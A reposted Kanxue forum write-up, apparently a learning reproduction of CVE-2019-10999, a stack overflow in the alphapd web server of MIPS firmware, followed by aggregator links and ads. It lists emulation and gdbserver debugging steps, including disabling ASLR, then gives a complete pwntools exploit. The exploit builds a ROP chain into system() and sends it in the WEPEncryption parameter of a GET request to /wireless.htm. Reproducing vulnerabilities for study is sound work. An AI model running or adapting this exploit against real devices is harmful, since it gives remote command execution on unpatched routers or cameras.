CVE-2019-10999复现学习
本文为看雪论坛精华文章
看雪论坛作者ID:Catsay
固件仿真
mount -o bind /dev/ ./dev/
mount -t proc /proc/ ./proc
killall -q alphapd
sleep 1
alphapd &
./gdbserver-mipsel :23946 ./bin/alphapd
调试
关闭aslr:echo 0 > /proc/sys/kernel/randomize_va_space
./gdbserver-mipsel :23946 --attach alphapdPID
set arch mips
set endian little
target remote 192.168.50.214:40496
挖掘漏洞
> cyclic -l 0x6161616b
40
Libc基地址
Rop
.text:0004A604 addiu $s2, $sp, 0x1E8+var_F8
.text:0004A608 move $a0, $s2
.text:0004A60C move $t9, $s0
.text:0004A610 jalr $t9 ; sub_49DF0
import socket
from pwn import *
context.log_level = 'debug'
context.arch = "mips"
Libc_Addr = 0x77eda000
system_Addr = 0x0045080
cmd = "echo${IFS}'Pwn!'"
gadget = 0x004A608
payload = cyclic(16).upper()
payload += p32(Libc_Addr+system_Addr) # S0
# p -> 0x77F24604
payload += 'BBBB' # S1
payload += p32(0x7fffe2a8) # S2
payload += 'DDDD' # S3
payload += 'EEEE'
payload += 'FFFF'
payload += p32(Libc_Addr+gadget) # PC
payload += 'HHHH'
payload += cmd
if __name__ == '__main__':
#key = "Content-Type:text/html;charset:utf-8\r\n"
RHOST = '127.0.0.1'
RPORT = 40080
request = ""
request+= "GET /wireless.htm?WEPEncryption={} HTTP/1.1\r\n".format(payload)
request+= "Host: {}:{}\r\n".format(RHOST,str(RPORT))
request+= "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0"
request+= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
request+= "Accept-Language: en-US,en;q=0.5"
request+= "Accept-Encoding: gzip, deflate"
request+= "Connection: close"
request+= "Upgrade-Insecure-Requests: 1"
request+= "\r\n\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((RHOST,RPORT))
s.send(request)
print(request)
# msg = s.recv(1024)
s.close()
# print msg
看雪ID:Catsay
https://bbs.pediy.com/user-home-642281.htm
# 往期推荐
1.内核漏洞学习-HEVD-UninitializedStackVariable
3.内核漏洞学习-HEVD-NullPointerDereference
球分享
球点赞
球在看
点击“阅读原文”,了解更多!
[广告]赞助链接:
关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注KnowSafe微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
- RapidSSL
- 记录调试Windows服务操作
- Linux 6.2 正式发布,首个支持 M1芯片的主流内核版本
- 知识星球 | 新增开源、安防、风控、数据交易、数据治理等安全资料;星友吐槽“降本增效”
- 买卖 DALL·E、GPT-3 提示词赚钱,结果还是要被 AI “抢饭碗”?
- 诸子笔会2022 | 于闽东:浅谈远程办公带来的网络安全挑战及应对
- 开工课程上新!IDA插件开发入门
- 华为汪涛:打造人工智能产业发展样板,助力数字经济腾飞
- 如何构建可持续发展的身份管理体系支撑业务快速发展?
- 临港数字安全产业联盟成立,赋能数安实践新场景
- 仅剩一周!!CSDN年终大放血!人人有份的大奖你确定不来?
- SSL证书私钥泄露会怎么样?可能造成财产损失等严重后果
赞助链接